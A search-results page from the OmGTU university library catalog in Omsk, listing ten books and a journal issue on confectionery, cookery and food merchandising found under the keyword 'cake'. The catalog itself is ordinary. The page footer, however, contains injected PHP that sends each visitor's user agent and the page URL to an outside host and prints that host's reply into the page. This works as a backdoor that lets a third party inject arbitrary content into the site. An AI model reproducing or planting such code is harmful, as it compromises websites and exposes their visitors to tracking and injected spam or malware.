Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

297 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КЕКС")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

2. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Табаторович, Александр Николаевич. Товароведение и экспертиза качества мучных кондитерских изделий [Текст] / А. Н. Табаторович, О. Д. Худякова ; дар. О. Д. Худякова, 2016. - 140 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей мучных кондитерских изделий. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлению подготовки 38.03.06 "Торговое дело", профиль Товароведение и экспертиза товаров, при изучении раздела "Кондитерские товары" в рамках дисциплины "Товароведение и экспертиза зерномучных и кондитерских товаров". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением мучных кондитерских изделий.

4. 
Товаровед продовольственных товаров. - Журнал, 2017г. № 7
Оглавление 
  • Окара, А. И. Исследование сывороточных экстрактов из плодово-ягодных выжимок / А. И. Окара, А. В. Жебо. - с.4-9. - Библиогр. в конце ст.
    Кл. слова: пищевая промышленность, сывороточные продукты, растительное сырье, технология разработки
  • Матвеева, Т. В. Применение тыквенного, морковного и апельсинового пюре в технологии кексовых изделий / Т. В. Матвеева. - с.10-15. - Библиогр. в конце ст.
    Кл. слова: кондитерские изделия, рецептура, качество, витамины, кекс
  • Николаева, М. А. Пути совершенствования действующих норм естественной убыли продовольственных товаров в торговли и общественном питании / М. А. Николаева, Г. Я. Резго. - с.16-23. - Библиогр. в конце ст.
    Кл. слова: продовольственные товары, товарные потери, предприятия торговли, общественное питание
  • Еремина, О. Ю. Формирование и оценка потребительских свойств молочных коктейлей / О. Ю. Еремина, С. А. Куценко. - с.24-28
    Кл. слова: молочные продукты, молочный коктейль, качество продуктов
  • Сидоренко, Ю. И. Вопросы современного теоретического товароведения / Ю. И. Сидоренко, Л. М. Луценко. - с.29-33. - Библиогр. в конце ст.
    Кл. слова: развитие товароведения, миссия товароведения, потребительские предпочтения
  • Николаева, М. А. Стратегические задачи и угрозы развития товароведения на современном этапе / М. А. Николаева. - с.34-41. - Библиогр. в конце ст.
    Кл. слова: товароведение, концепция, образование
  • Кутина, О. И. Разработка, внедрение на предприятиях перспективных технологий нового ассортимента рыборастительных продуктов, отвечающих современным требованиям здорового питания и продовольственной безопасности / О. И. Кутина, И. Н. Игонина, А. О. Дряхлов. - с.42-61. - Библиогр. в конце ст.
    Кл. слова: рыборастительные продукты, показатели качества, методы исследований
  • Елисеева, Л. Г. Оценка безопасности пищевых продуктов и растительного сырья с использованием методов биотестирования / Л. Г. Елисеева, И. Б. Леонова, Д. П. Улаханова. - с.62-64. - Библиогр. в конце ст.
    Кл. слова: пищевые продукты, безопасность, биосенсоры, ксенобиотики
Держатели документа (Информация об экземплярах) 
5. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
6. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
7. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
8. 
Донцова, Дарья Аркадьевна. Кекс в большом городе [Текст] : роман / Дарья Донцова, 2005. - 372, [9] с.
Ключевые слова 
Оглавление 
  • Советы от безумной оптимистки Дарьи Донцовой
Держатели документа (Информация об экземплярах) 
9. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
10. 
Кенгис, Роберт Петрович. Изделия из теста [Текст] / Р. П. Кенгис, 1958. - 192 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.38 с.14 запросов, 2.16c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;